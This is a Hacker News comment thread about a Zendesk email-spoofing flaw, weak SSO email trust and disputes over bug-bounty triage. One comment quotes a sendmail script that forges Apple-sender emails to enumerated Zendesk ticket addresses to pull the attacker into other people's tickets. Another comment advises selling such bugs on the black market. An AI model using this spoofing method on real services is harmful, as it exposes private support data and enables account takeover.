Reported this exact bug to Zendesk, Apple, and Slack in June 2024, both through HackerOne and by escalating directly to engs or PMs at each company.
I doubt we were the first. That is presumably the reason they failed to pay out.
The real issue is that non-directory SSO options like Sign in with Apple (SIWA) have been incorrectly implemented almost everywhere, including by Slack and other large companies we alerted in June.
Non-directory SSO should not have equal trust vs. directory SSO. If you have a Google account and use Google SSO, Google can attest that you control that account. Same with Okta and Okta SSO.
SIWA, GitHub Auth, etc are not doing this. They rely on a weaker proof, usually just control of email at a single point in time.
SSO providers are not fungible, even if the email address is the same. You need to take this into account when designing your trust model. Most services do not.
I do web app testing and report a similar issue as a risk rather often to my clients. You can replace Google below with many other identity providers.
Imagine Bob works at Example Inc. and has email address [email protected]
Bob can get a Google account with primary email address [email protected]. He can legitimately pass verification.
Bob then gets fired for fraud or sexual harassment or something else gross misconduct-y and leaves his employer on bad terms.
Bob still has access to the Google account [email protected]. It didn't get revoked when they fired him and locked his accounts on company systems. He can use the account indefinitely to get Google to attest for his identity.
Example Inc. subscribes to several SaaS apps, that offer Google as an identity provider for SSO. The SaaS app validates that he can get a trusted provider to authenticate that he has an @example.com email address and adds him to the list of permitted users. Bob can use these SaaS apps years later and pull data from them despite having left the company on bad terms. This is bad.
I think the only way for Example Inc. to stop this in the case of Google would be to create a workspace account and use the option to prove domain ownership and force accounts that are unmanaged to either become managed or change their address by a certain date. https://support.google.com/a/answer/6178640?hl=en
Other providers may not even offer something like this, and it relies on Example Inc. seeking out the identity providers, which seems unreasonable. How do you stop your corporate users signing up for the hot new InstaTwitch gaming app or Grinderble dating service that you have never heard of and using that to authenticate to your sales CRM full of customer data?
This is the right answer for this problem. If you're not interested in being a paying workspace customer, get cloud identity free and verify your domain. You can then take over and/or kick out any consumer users in the domain.
Every time I've left an organization, they have swiftly deleted the company email address/revoked my access to it. I assume every reasonable organization will have processes in place to do this.
I don't see this as a vulnerability: how is Google supposed to know that a person has left the company? You let them know by deleting the account.
In the above example, the normal flow to get a Google address [email protected] relies on setting DNS records for company.com, both to prove control of the domain as well as to route email to that domain. There may be an exploit/bypass I'm not seeing, but I legitimately don't see any way a user who has a legitimate [email protected] email address hosted somewhere besides Google workspace could then setup a [email protected] email address with Google.
If there's a way to do this, I would greatly appreciate a link or brief explanation, as our process for employee termination/resignation does involve disabling in the Google admin portal and if we need to be more proactive I definitely want to know.
The issue here is that if company.com does not use Google Workspace and hasn't claimed company.com, then any employee can sign up for a "consumer" Google account using [email protected].
There are legitimate reasons for this, e.g. imagine an employee at a company that uses Office365 needing to set up an account for Google Adwords.
You can sign up for google with an existing email. So if example.com is all on MS365 that's where the admins control stuff. No google workspace at all, no DNS records or proof of domain to anyone but MS.
So anyone with an example.com email can make a google account using that email as their login. Verify they have the email and that's their login. A common system for users who need to use google ads or analytics.
But when the company disables 365 login the google account remains. And if you use something third party that offers a "Sign in with google" then assumes because you have a google account ending "example.com" you are verified as "example.com" you've got access even if that account is disabled.
If you have the google admin portal this doesn't work as you're controlling it there. But signing up for Microsoft or Apple accounts with that google workspace address might have the same loophole.
That removes you from their system. If I make a GitHub account using [email protected], GitHub doesn't get notified that I got fired from example.com, so I can keep using my GitHub [email protected] account in places that ask GitHub if I'm [email protected] even though I don't have access to that email anymore.
This no longer happens for services that have accounts that follow a social media style. For such accounts, employees are expected their own accounts (presumably with followers, reputation etc.) and keep it after leaving the company. For real social media, this is probably fine, but I don't understand why we accept this model for Github and Gitlab (and Sourceware before that). Even from an employee perspective, it's not great because it makes it unclear who owns what. Especially with services like Github which have rules about how many accounts you can create for one person, and under what circumstances.
I have no idea how this is supposed to work in practice for Github and Gitlab, where people gain access to non-public areas of those websites, but they are still expected to use their own accounts which they keep after leaving their employer.
(The enterprise-managed Github accounts do not address this because they prevent public, upstream collaboration.)
This is why you store and match on the sso provider’s uuid, not on the email address. Emails are not a unique identifier and never have been. Someone can delete their email account and later someone else can sign up and claim the same email. Anyone matching on email addresses is doing it wrong. I’ve tried to argue this to management at companies I’ve worked at in the past, but most see my concern as paranoid.
I wonder why Google would make an SSO assertion along the lines of "yes, this user Bob has email address [email protected]" in the situation where example.com is not under a Workspace account. Such assertions ought to be made only for Workspace (and Google's own domains such as gmail.com, googlemail.com, etc.) since outside of that it's obsolete proof as you say, i.e. it's merely a username of a Google account which happens to look like an email address, and nothing more.
I read the GP's question as "why" would Google allow that in the first place?
The reason is obvious: because a Google account gets you access to many a Google service without requiring you to open a Gmail account.
However, the question still stands: why does Google allow authentication with a non-Gmail/Workspace account? Yes, it would be confusing since not all Google Accounts would be made the same, but this entire class of security issues would disappear.
So it's the usual UX convenience vs security.
Alternative "fix" that's both convenient and secure is to have every company use Google Apps on their domain ;-)
Perhaps the following could be a solution to this issue?
Any OAuth provider should send a flag called "attest_identity_ownership" (false, true) as part of the uaht flow, which is set to true if the account is a workspace account or gmail (or the equivalent for other services), and false if the email is an outside email. Thus, the service handling the login could decide whether to trust the login or proceed otherwise, e.g. by telling the user to use a different OAuth service/internal mechanism where the identity is attested.
If anyone needs motivation of such unmanaged users, I actively use this feature. I have my own Google Workspace on my own domain. Years ago when I bought a Nest product I found that I couldn't use a Google Workspace account to access Nest. No problem, I create a consumer Google account under my Google Workspace domain. The email looks just like a Workspace account. And it doesn't need any additional Workspace licenses. (I no longer plan to buy any more Nest devices so I'll delete the account once my last Nest product stops working.)
Presumably one of the PMs you’re referring to has posted this article for additional information. Feels like they’re doubling down on their initial position.
> Although the researcher did initially submit the vulnerability through our established process, they violated key ethical principles by directly contacting third parties about their report prior to remediation. This was in violation of bug bounty terms of service, which are industry standard and intended to protect the white hat community while also supporting responsible disclosure. This breach of trust resulted in the forfeiture of their reward, as we maintain strict standards for responsible disclosure.
Wow... there was no indication that they even intended on fixing the issue, what was Daniel hackermondev supposed to do? Disclosing this to the affected users probably was the most ethical thing to do. I don't think he posted the vulnerability publicly until after the fix. "Forfeiture of their award" -- they said multiple times that it didn't qualify, they had no intention of ever giving a reward.
As someone who manages a bug bounty program, this kind of pisses me off.
For some of our bugs given on h1, we openly say, "Hey, we need to see a POC in order to get this to be triaged." We do not provide test accounts for H1 users, so, if they exploit someone's instance, we'll not only take the amount that the customer paid off of their renewal price, we'll also pay the bounty hunter.
Fwiw, I wouldn't be surprised if the author of this article is a bit upset that Daniel hackermondev gained a significant % of the income that the author makes a year. If this was "fixed" by Zendesk, they would have paid less than a few % from the 50k they actually made.
Edit: to those downvoting, the fact of the matter is that Zendesk's maximum bounty is far lower than 50k; yet OP made 50k; meaning by definition the value of the vulnerability was at least 50k.
If anything, they are probably upset that they apparently lost some customers over this. That must (rightfully) hurt. But it's their own mistake - leaving a security bug unaddressed is asking for trouble.
He didn't even "go public" as that term is normally used in bug disclosure. He didn't write it up and release and exploit when Zendesk told him it was out of scope and didn't give him any indication they considered it a problem or were planning a fix. Instead he reached out to affected companies in at least a semi private way, and those companies considered the bug serious enough to pay him 50k collectively and in at least some cases drop Zendesk altogether.
I am 100% certain that every one of the companies that paid the researched would consider the way this was handled by that researched "the best alternative to HackerOne rules 'ethical disclosure' in the face of a vendor trying to cover up serious flaws".
In an ideal world, in my opinion HackerOne should publicly revoke Zendesk's account for abusing the rules and rejecting obviously valid bug payouts.
Aren't such disputes about scope relatively common? Not sure what Hackerone can do about it.
For example, most Hackerone customers exclude denial-of-service issues because they don't want people to encourage to bring down their services with various kinds of flooding attacks. That doesn't mean that the same Hackerone customers (or their customers) wouldn't care about a single HTTP request bring down service for everyone for a couple of minutes. Email authentication issues are similar, I think: obviously on-path attacks against unencrypted email have to be out of scope, but if things are badly implemented that off-path attacks somehow work, too, then that really has to be fixed.
Of course, what you really shouldn't do as a Hackerone customer is using it as a complete replacement for your incoming security contact point. There are always going to be scope issues like that, or people unable to use Hackerone at all.
Once they'd brushed him off and made it clear they were not interested in listening to him, resolving the bug, or living up to the usual expectations that researchers have in companies claiming to have bug bounties on HackerOne, I'd say they lost any reasonable expectation that he'd do that.
I'll note he did go to the effort of having the first stab at that sort of resolution, when he pushed back on HackerOne's inaccurate triage of the bug as an SPF/DKIM/DMARC email issue. He clearly understood the need for triage for programs like this, and that the HackerOne internal triage team didn't understand the actual problem, but again was rebuffed.
When in doubt, go with the side which has been forthcoming. Zendesk didn’t publish details and wrote their post misleadingly describing it as a supply chain problem sounding almost as if they were a victim rather than the supplier of the vulnerability. It’s always possible that there are additional details which haven’t come out yet but that impression of a weasel-like PM is probably accurate.
That article claims to have “0 comments”, but currently sits at a score of -7 (negative 7) votes of helpful/not helpful. I think they have turned off comments on that article, but aren’t willing to admit it.
EDIT: It’s -11 (negative 11) now. Still “0 comments”.
In damage control mode, Zendesk can't pay a bounty out here? Come on. This is amateur hour. The reputational damage that comes from "the company that goes on the offensive and doesn't pay out legitimate bounties" impacts the overall results you get from a bug bounty program. "Pissing off the hackers" is not a way to keep people reporting credible bugs to your service.
I don't understand what this tries to accomplish. The problem is bad, botching the triage is bad, and the bounty is relatively cheap. I understand that this feels bad from an egg-on-face perspective, but I would much rather be told by a penetration tester about a bug in a third-party service provider than not be told at all just to respect a program's bug bounty policy.
> "Pissing off the hackers" is not a way to keep people reporting credible bugs to your service.
That doesn’t matter if your goal with a bug bounty program is not to have people reporting bugs, but instead to have the company appear to care about security. If your only aim is to appear serious about security, it doesn’t matter what you actually do with any bug reports. Until the bugs are made public, of course, which is why companies so often try to stop this by any means.
sounds like a great way to get a bunch of black hats to target you after pissing off the white hats. Playing nice with people this smart should be precisely to prevent this kind of damage to a company that results in losing clients.
But I geuss corporations ignoring security for more immediately profitable ventures on the quarterly report is a tale as old as software.
"Hi, we are ZenDesk, a support ticket SaaS with a bug bounty program that we outsource to our effected customers, who pay out an order of magnitude more than our puny fake HackerOne program. Call now, to be ridiculously upsold on our Enterprise package!"
We, the company that doesn't understand security, can't tell whether this was exploited, therefore we confidently assert that everything is fine. It's self consistent I suppose but I wouldn't personally choose to scream "we are incompetent and do not care" into the internet.
As a former ZD engineer, shame on you Mr Cusick (yes, I know you personally) and shame on my fellow colleagues for not handling this in a more proactive and reasonable way.
Another example of impotent PMs, private equity firms meddling and modern software engineering taking a back seat to business interests. Truly pathetic. Truly truly pathetic.
This is very important to keep in mind when implementing OAuth authentication! Not every SSO provider is the same. Even if the SSO provider tells you that the user's email is X, they might not even have confirmed that email address! Don't trust it and confirm the email yourself!
Use OIDC. It is based on Oauth. I would fiddle with implementing basic Oauth clients first. Like a Spotify playlist fetcher or something. Just to start getting a feel for the flows and things you would be concerned with.
[1] - They had to go commercial to stay afloat, there wasn't enough contributions from community/etc. That said it's pretty cheap for what it does in the .NET space.
Can you explain a bit more what makes Sign in with Apple different from Google Sign-in? Apple certainly does maintain a list of users with accounts. So what does "non-directory" mean here exactly? Why can Apple not attest that you control that account at sign-in time?
Now? nothing.
I think this thinking is a relic of Google's status as seemingly the last remaining email provider to automatically create a Gmail account when signing up for a Google account. So using Google SSO meant using your Gmail account, and so control of the email address was nessissary for control of the Google account. If you lose the email account, you lose the Google account. This is not true anymore since you can sign up for a Google account with any email.
Whereas you can (and I believe always could*) create an apple ID with any old email address.
*Maybe this delinked situation only came about when they added the App Store to OS X, and figured they'd make less money if they require existing Mac users to get a new email account in order to buy programs in the manner which would grant them a cut.
Apple has a list of all the email addresses for its sole IDs, but it doesn't control them, and having one deleted doesn't nessisarilly affect the other.
Google and custom domain email have always been delinked from this perspective. You could create a Google account with a custom domain and then point the domain elsewhere or lose control of it, and you'd still retain conto of the account.
Basically, the required example essentially theoretical at this point - maybe it works for employers at companies that also happen to provide SSO services. So if you work at Facebook, Google, Apple, or github and have a [email protected] email dress, and you signed into slack through the SSO that affiliated with your company and the company email, but later don't work there and you've had your work account access revoked, you won't be able to use that SSO to sign into slack. That's what they mean by directory control or whatever.
In contrast, if you sign up to github with your work email account, unless it's a managed device managed by your work, your work doesn't actually control the account. They just vouched for your affiliation at sign up when you verified your email. So if you use a github SSO to sign up for a service that 'verifies' your work email address from github during the process, that won't change when you leave and the company revoked access to the email. Github SSO, in this case, isn't verifying you have an email account @company.com. They are verifying you once did, or at least once had, access to it. This is what they mean by the non-directory whatever.
I think what he means is, if you have an @gmail.com account via Google, that is pretty good proof of control. But if you have any other e-mail (e.g. a custom domain) via Google, it's not.
Similar with Apple, if you were signing in with an @icloud.com, it's pretty good proof, but if you have an Apple ID with a third-party e-mail it's not proof of current control of that e-mail.
That helps, but I still don't have a full picture. What's the threat here? Is it that: if a hacker gains temporary access to Bob's email [email protected], they can create an Apple account attached to it, and use that account to sign in with a service ABC, then that hacker gains access to Bob's private info in service ABC? But if the hacker already has email access, can't he just log into service ABC directly anyway?
Also, is it impossible to have a Google account with a non-gmail address? The original poster seemed to be saying that Google _is_ a directory SSO and Apple _is not_ categorically. But if you can have a Google account without a Gmail-ran email account, wouldn't Google have the same vulnerability?
I think the most likely threat in this case is with ex-employees. If Bob has access to [email protected] and creates an Apple account with it, then subsequently gets fired from example.com, they might delete his email address but his Apple account will still allow him to login to services using Sign in with Apple. (Because Apple only checks ownership of the email address when the Apple account is being created.)
Google accounts have the exact same issue so I don't understand the distinction made by the OP though.
You can also sign up for a google account using a non-gmail email address without creating a new gmail address, providing the domain owner hasn't created a workspace account with that domain in the past.
This can be done with an account that you once had control over but don't anymore, like if you leave an employer.
You can't send mail from it, but many apps will take having a google account with a given email is proof of ownership, or an @example.com email address is proof that you are an employee of Example Inc. when they are a customer of the app and have a tenant set up.
Isn't the simplest solution here to not support SSO at all?
I get there's a convenience factor, but even more convenient is the password manager built into every modern browser and smartphone. If the client decides to use bad passwords, that's will hurt them whether or not they're using SSO.
It sounds like the author got stiffed by Zendesk on this bug, $0 due to email spoofing being out of scope.
The $50k was from other bug bounties he was awarded on hackerone.
It's too bad Zendesk basically said "thanks" but then refused to pay anything. That's a good way to get people not to bother with your big bounty program. It is often better to build goodwill than to be a stickler for rules and technicalities.
Side note: I'm not too surprised, as I had one of the worst experiences ever interviewing with Zendesk a few years back. I have never come away from an interview hating a company, except for Zendesk.
> That's a good way to get people not to bother with your big bounty program.
And possibly to have blackhats to start looking more closely, since they now know both 1) that whitehats are likely to be focusing elsewhere leaving more available un-reviewed attack surface, and 2) that Zendesk appears to be the sort of company who'll ignore and/or hide known vulnerabilities, giving exploits a much longer effective working time.
If "the bad guys" discovered this (or if it had been discovered by a less ethically developed 15 year old who'd boasted about it in some Discord or hacker channel) I wonder just how many companies would have had interlopers in their Slack channels harvesting social engineering intelligence or even passwords/secrets/API keys freely shared in Slack channels? And I wonder how many other widely (or even narrowly) used 3rd party SaaS platforms can be exploited via Zendesk in exactly the same way. Pretty much any service that uses the email domain to "prove" someone works for a particular company and then grants them some level of access based on that would be vulnerable to having ZenDesk leak email confirmations to anybody who knows this bug.
Hell, I suspect it'd work to harvest password reset tokens too. That could give you account takeover for anything not using 2FA (which is, to a first approximation over the whole internet, everything).
If I am not mistaken, it wasn't zendesk that didn't want to recognize the bug, but HackerOne that did not escalate to Zendesk that they should reconsider the exclusion ground in this case.
As an aside, I wonder if those bounties in general reflect the real value of those bugs. The economic damage could be way higher, given that people share logins in support tickets.
I would have expected that the price on the black market for these kind of bugs are several figures larger.
The author specifically stated: "Realizing this, I asked for the report to be forwarded to an actual Zendesk staff member for review", before getting another reply for H1. I read this as they escalated it to Zendesk directly, who directed it back to HackerOne.
It wasn't clear to me as even at that point it was an "H1 Mediator" who responded.
Also the bit about SPF, DKIM and DMARC seems to show a misunderstanding of the issue: these are typically excluded because large companies aren't able to do full enforcement on their email domains due to legacy. It's a common bug report.
In this case, the problem was that Zendesk wasn't validating emails from external systems.
It doesn't matter if the decision that this bug doesn't matter came from a Zendesk employee or Zendesk contractor (in this case H1). Zendesk authorized them to make decisions on the matter.
The audacity to say "this is out of scope" then "how dare you tell anyone else" is something else.
In this case, that probably means that H1 had a Zoom or Slack convo with the team and is relaying their decision into text instead of making them write it down themselves.
Yeah probably, but what information did H1 relay to them? Did they read the email, or did they get H1's interpretation of the bug? Because the SPF/DKIM/DMARC stuff really doesn't make sense with context.
> If I am not mistaken, it wasn't zendesk that didn't want to recognize the bug, but HackerOne that did not escalate to Zendesk that they should reconsider the exclusion ground in this case.
Correct, the replies seem to have come from H1 triage and H1 mediation staff.
They often miss the mark like this. I opened a H1 account to report that I'd found privileged access tokens for a company's GitHub org. H1 triage refused to notify the company because they didn't think it was a security issue and ignored my messages.
> If I am not mistaken, it wasn't zendesk that didn't want to recognize the bug
While it's unclear at which stage Zendesk became involved, in the "aftermath" section it's clear they knew of the H1 report, since they responded there. And later on the post says:
"Despite fixing the issue, Zendesk ultimately chose not to award a bounty for my report. Their reasoning? I had broken HackerOne's disclosure guidelines by sharing the vulnerability with affected companies."
The best care scenario as I see it is that Zendesk has a problem they need to fix with their H1 triage process and/or their in and out of scope rules there. And _none_ of that is the researcher's problem.
The worst (and in my opinion most likely) scenario, is that Zendesk did get notified when the researcher asked H1 to escalate their badly triaged denial to Zendesk for review, and Zendesk chose to deny any bounty and tried to hide their vulnerability.
> As an aside, I wonder if those bounties in general reflect the real value of those bugs. The economic damage could be way higher, given that people share logins in support tickets.
I think it's way worse than that, since internal teams often share logins/secrets/API keys (and details of architecture and networking that a smart blackhat would _love_ to have access to) in thei supposedly "internal" Slack channels. I think the fact that non Zendesk "affected companies" paid out $50k sets that as the absolute lower bound of "the real value of those bugs. And it's _obvious_ that the researcher didn't contact _every_ vulnerable Slack-using organisation. I wonder how much more he could have made by disclosing this to 10 or 100 times as many Slack using organisations, and delaying/stalling revealing his exploit POC to Zendesk while that money kept rolling in?
I'll be interested to see if HackerOne react to this, to avoid the next researcher going for this "second level" of bug bounty payouts by not bothering with H1 or the vulnerable company, and instead disclosing to companies affected by the vulnerability instead of the companies with the vulnerability? It's kinda well known that H1 buy bounties are relatively small, compared to the effort required to craft a tricky POC. But people disclose there anyway, presumably party out of ethical concerns and partly for the reputation boost. But now we know you can probably get an order of magnitude more money by approaching 3rd party affected companies instead of cheapskate or outright abusive companies with H1 bounties that they choose to downvalue and not pay out on.
Hackerone staffs are not that good. They usually mark anything from a non famous person as a duplicate (even if it differs in nuances, which eventually lead to much more impact) or straight out of scope.
I think it's just laziness. Plus they hire previous famous reporter as the people triaging the reports, those famous people know other famous people first hand, they usually think "hmm, unknown guy, must have ran a script and submitted this"
I have stopped reporting stuff since last 5 years due to the frustration. And it seems the situation is still the same even after so many years.
I believe their logic was that only the domain owner can adequately prevent email spoofing by proper SPF/DMARC configuration, and that it’s the customers’ fault if they don’t do that. Which isn’t entirely wrong.
In a past life I was involved in a bug bounty program. I don't think the reasoning is as detailed.
When you stand up a bug bounty program you get a ton of "I opened developer tools, edited the js on your page, and now the page does something bad" submissions. "I can spoof some email headers and send an email to myself that looks like it is coming from you" isn't something I've specifically seen due to some weird details about my bounty program but it is something I would absolutely expect for many programs to see.
So you need a mechanism to reject this stuff. But if that mechanism is just "triage says this is dumb" you get problems. People scream at you for having their nonsense bug rejected. People submit dozens of very slightly altered "bugs" to try to say "you rejected the last one for reason X but this one does Y." So you create a general policy: anything involving email spoofing is out of scope.
So then a real bug ends up in front of the triage person. They are tired and busy and look at the report and see "oh this relies on email spoofing, close as out of scope." Sucks.
I think that Zendesk's follow up here is crap. They shouldn't be criticizing the author for writing about this bug. But I do very much understand how things end up with a $0 payout for the initial report.
Right, but I would be really shocked if Zendesk's internal email handler was doing any SPF/DKIM/DMARC validation at all. So even if a domain has DMARC set up, Zendesk is probably ignoring it. Which is probably pretty reasonable given how rare DMARC reject/quarantine has been historically
> Create an Apple account with [email protected] email and request a verification code, Apple sends verification code from [email protected] to [email protected] and Zendesk automatically creates a ticket
I agree with your point, but that email's not the best example because it would have passed SPF/DMARC/DKIM. It's a step or two later that involved sending a spoofed email from [email protected] :
const sendmail = require('sendmail')();
// Assuming the ticket you created in step #2 was assigned a ticket ID of #453
// verification email landed somewhere near there
const range = [448, 457];
for (let i = range[0]; i < range[1]; i++) {
// Send spoofed emails from Apple to Zendesk
sendmail({
from: '[email protected]',
to: `support+id${i}@company.com`,
cc: '[email protected]',
subject: '',
html: 'comment body',
}, function (err, reply) {
console.log(err && err.stack)
console.dir(reply)
});
};
This is exactly my point: if Apple has SPF/DKIM/DMARC configured correctly, then Zendesk should be validating the email sender. That they didn't is technically an SPF/DKIM/DMARC issue - a bug in Zendesk - but it is not a customer misconfiguration issue.
You don't want to too strict technical validations on your helpdesk contact points, though. It's supposed to be reachable when things are broken. So it's not as easy as just reconfiguring incoming mail relays. You might need separate domains for extended validation, or a reliable (!) way to relay authentication results to those mail endpoints that need it. Come to think of it, presenting email validation results to helpdesk staff might be a good idea in general.
Good, it gives NOERROR, which indicates the existence of subdomains. Just to be sure, we check some other arbitrary non-existing subdomain, to see if it gives NXDOMAIN as it should:
Since it gives the expected NXDOMAIN, this strongly indicates that there are DNS records present on subdomains of “_domainkey.id.apple.com”; i.e. DKIM keys.
(Of course, if you have ever recieved e-mail from an address @id.apple.com, you would see the selector name in the DKIM signature header, and could look up the corresponding DKIM record directly. The above method is for when you don’t have access to that.)
Future hackers, take note. If vulnerabilities you discover have any chance of being misinterpreted as "out of scope" by some bureaucrat at HackerOne, even though they're obviously applicable and dangerous, sell them on the market instead.
maybe because the issue is not about apple's dns records, so the vulnerability is in scope. One could argue the issue is in zendesk's feature of adding people with an email.
I wonder how redirects from [email protected] to zendesk work? if it's via MX records pointing to zendesk that it's zendesk's fault for not checking DMARC
If it's another type of redirect then yes, you can blame customers for not verifying DMARC
HackerOne declared the issue out of scope so I don't see why disclosure would make a difference here. Had this person not notified different companies, they still wouldn't get a dime from HackerOne.
Bad showings all around, for both HackerOne and Zendesk.
(There's a not-very-convincing argument that they declared the ability to view support tickets as out of scope, but were not given a chance to assess the Slack takeover exploit's scope.)
The Slack takeover exploit is a problem on Slack's end (and sounds more like a configuration issue than a bug) so Zendesk would not be responsible for that anyway though.
Don't get me wrong, Zendesk definitely has their own separate problem: you should not be able to CC yourself onto an existing support ticket by emailing a guessable ticket ID.
But simultaneously you should not be able to get into a company Slack by simply having an account with a @company.com email address created by a third-party SSO provider.
In other words, even in Zendesk fixed their problem, Slack would still have a problem on their end.
I too had the worst interview experience with zendesk. The people I talked to were pretty senior folks too. They just seem to have a very petty and toxic work culture.
The black market also exists because the potential payout for serious 0days by official programs is almost always less than what a third-party adversary will pay (if the target(s) for them are worth it).
The same presentation also mentions (starting slide 17) how the requirements of 0days differs from public research, which is why some vulnerabilities would be difficult to sell.
This. Fortunately the law makes it that it’s inconvenient (possible prison time) to use the black market, which is a big thumb on the balance, but bug bounties are also often only $3000…
> Fortunately the law makes it that it’s inconvenient (possible prison time) to use the black market
Don't forget that most people also simply don't sell bugs. They're not for sale in the first place; the bounty would be a thank-you or nice bonus, not a replacement for selling it
I'm certainly not in a criminal bubble so I can't say how big the other side is, but (as a security consultant who knows a reasonable number of hackers) I doubt that I know anyone who'd choose, after getting no response from the company, to sell a bug for profit to a louche party rather than going full disclosure and warning everyone -- or just doing nothing because it's not like it's their problem
Edit: nvm someone did come to mind. We tried to steer them onto the right path at our weekly CTF team meetings but I'm not sure we succeeded. Anywho, still one to a few dozen
Which law makes it a criminal sanction to use a black market like darknet marketplaces
Software Exploits arent considered arms it is information that can be sold, the liability is on the person that does the unauthorized access, the person that steals data, the person that uses the data
Hacking syndicates distribute liability akin to any corporation
>which puts the liability on the person that does the unauthorized access
Which is almost always the person finding the bug. Most services include language that limit your ability to find vulnerabilities in their systems as part of being allowed to access their service. If you find the vulnerability without ever accessing the service you might have an out, but that also means you have to sell the exploit with less ability to convince the buyer that it is something significant.
You will typically be held liable for who you are selling your bugs to. If your bug ends up in the wrong hands you can’t just say “but I deal with everyone”.
> Side note: I'm not too surprised, as I had one of the worst experiences ever interviewing with Zendesk a few years back. I have never come away from an interview hating a company, except for Zendesk.
Same thing happened to me years ago. Interviewed with them and it was the worst “screening” experience I ever had. After getting a rejection email, I thanked them for their time and said I had feedback about the interview should they want to hear it. They said yes, please.
Same it was time-wasting interview experience. They seem interested and not interested at the same time. They pinged me for a different role after passing me up for the first role, but didn't get any response later..
Beg bounty hunters are not to blame for utterly abysmal responses by these platforms. Especially after they ghost the researcher and then moan about publication.
Proper response would be to update your program to triage these vulns and thank the researcher for not going public straight away. This current approach is burning a tremendous amount of goodwill.
You can’t triage them yourself is the point because you get two dozen bogus beg bounty’s each day - this is a full time job!
So you need such a platform, etc.pp.
I help corporates evaluate and buy software. Having an ineffective bug bounty program, especially one that rewards black market activity on a terms & conditions technicality like this, is enough for me to put a black mark on your software services.
I don’t care if you’re the only company in the market, I’ll still blackball you for this in my recommendations.
Zendesk should pay up, apologize and correct their bug bounty program. After doing so, they should kindly ask the finder to add an update to this post, because otherwise it will follow them around like dogshit under their shoe.
They should absolutely inform a client company of a perceived threat, when they agree on the threat
Most of the person’s post and responses here are about Zendesk’s issue, but Zendesk was never informed
for a better PR response, I think now Zendesk could reward this after realizing it wouldnt have been disclosed first, and admonish HackerOne for not informing them and the current policies there
> Most of the person’s post and responses here are about Zendesk’s issue, but Zendesk was never informed
It's not clear whether they were informed. The mediator's email says "after consultations with *the team*", which is likely referring to Zendesk's security team.
It anyways took Zendesk several months to fix the issue and they also didn’t acknowledge the author with what should be a very sizeable bounty. It’s not every day that someone tries to warn you about a massive security hole and then goes out of their way to warn your clients for you because you ignored them.
Zendesk was informed. OP specifically said they asked h1 to escalate to the company itself and the second email they present way from someone from Zendesk, who still rejected them, adding that this decision was made “after consulting with the team”.
A $1.3 billion revenue company being too tight to pay this after all, even on their 2nd chance, is so short-sighted it's absurd. They're putting out a huge sign saying "When you find a vuln, definitely contact all our clients because we won't be giving you a penny!".
Incredible. This must be some kind of "damaged ego" or ass-covering, as it's clearly not a rational decision.
Edit: Another user here has pointed out the reasoning
> It's owned by private equity. Slowly cutting costs and bleeding the brand dry
It all makes sense if you consider bug bounties are largely:
1) created for the purpose of either PR/marketing, or a checklist ("auditing"),
2) seen as a cheaper alternative to someone who knows anything about security - "why hire someone that actually knows anything about security when we can just pay a pittance to strangers and believe every word they say?"
The amusing and ironic thing about the second point is that by doing so, you waste time with the constant spam of people begging for bounties and reporting things that are not even bugs let alone security issues, and your attention is therefore taken away from real security benefits which could be realized elsewhere by talented staff members.
I don’t agree. Bug bounties are taken seriously by at least some companies. Where I have worked, we received very useful reports, some very severe, via HackerOne.
The company even ran special sessions where engineers and hackers were brought together to try to maximize the number of bugs found in a few week period.
It resulted in more secure software at the end and a community of excited researchers trying to make some money and fame on our behalf.
The root cause in this case seems to be that they couldn’t get by HackerOne’s triage process because Zendesk excluded email from being in scope. This seems more like incompetence than malice on both of their parts. Good that the researcher showed how foolish they were.
This feels like a case in the gray area. On the one hand, companies need to declare certain stuff out of scope - whether they know about it and are planning to work on it, or consider it acceptable risk, as the point for the company is to help them improve their security posture within the scope of the resources they have to run the bug bounty program. What's weird here is that the blog author found an email problem that wasn't really in that DKIM/SPF etc area, and Zendesk claimed that exemption covered it. Without a broader PoC to show how it could be weaponized, it's hard to say that Zendesk was egregiously wrong here - the person triaging just lacked the imagination to figure out that it would be a real problem. Hell, later in the write up we learn Zendesk does do spam filtering on the inbound emails, and so it's not crazy to think a security engineer reading the report may assume that stuff would cover their butts, when it failed miserably here. (A good Engineer would check that assumption though)
That said putting my security hat on, I have to ask - who thought that sequential ticket ids in the reply-to email address were a good idea? they really ought to be using long random nonces; at which point the "guess the right id to become part of the support thread" falls apart. Classic enumeration+IDOR. So it sounds like there's still a potential for abuse here, if you can sneak stuff by their filters.
>Without a broader PoC to show how it could be weaponized, it's hard to say that Zendesk was egregiously wrong here
The implications of being able to read arbitrary email contents from arbitrary domains' support (or otherwise) addresses are well known, and any competent security personnel in ZenDesk's security team should know this is exactly what can happen.
Something similar has been discussed on HN before: https://news.ycombinator.com/item?id=38720544 but the overall attack vector of "get registration email send to somewhere an attacker can view it" is not novel at all; it's also how some police database websites have been popped in the past (register as @fbi.gov which automatically gives you access; somehow access the inbox of @fbi.gov due to some public forwarding, for example)
Yes, I expect a security engineer to hold knowledge. That's why they have a job, instead of replacing the security them with an LLM. If nobody in the team has that experience, it speaks exactly to the issue that has been outlined in the OP: not enough knowledge of security issues beyond the basics.
>Without a broader PoC to show how it could be weaponized, it's hard to say that Zendesk was egregiously wrong here
There was a PoC of how to view someone else's ticket (assuming you know the other person's email and approximately when the ticket was filed).
>it's not crazy to think a security engineer reading the report may assume that stuff would cover their butts
It sounds like they got a report saying "I can spoof an email and view someone else's report". Why would they assume the spam protection would protect them when they have a report saying it's not protecting them?
I suppose my point is "read someone else's ticket" is far from the worst case scenario here. It certainly sounds like zendesk didn't care to protect ticket contents ... Which the more I think about it is pretty egregious, as support tickets can include PII.
In general, I do expect for the folks reading hackerone reports to make some mistakes; there's a lot of people who will just run a vulnerability scanner and report all the results like they've done something useful. Sometimes for real bugs you have to explain the impact with a good "look what I can do with this."
Also, the poster didn't share their submission with us, just the responses. So it's hard to know how clear they were to zendesk. A good bug with a bag explanation o would not expect to get paid
>Sometimes for real bugs you have to explain the impact with a good "look what I can do with this."
I'm not sure. Anybody that keeps up to date with security (e.g. those working in a security team) should know that ticketing systems also contains credentials sometimes. For example when Okta was breached, the main concern was that Okta support tickets contain.... session tokens, cookies, and credentials!
What's the point of having a security team that can't directly link external experience to their own system? Learning the same mistakes that have already been known?
I use a competitor to HackerOne. I view all submissions pre-triage and would have taken it seriously, even if I made a mistake in program scope. I have paid researchers for bugs out of scope before because they were right.
HackerOne is an awful company with a terrible product. Not the first time I’ve heard of their triage process or software getting in the way of actual bug bounty.
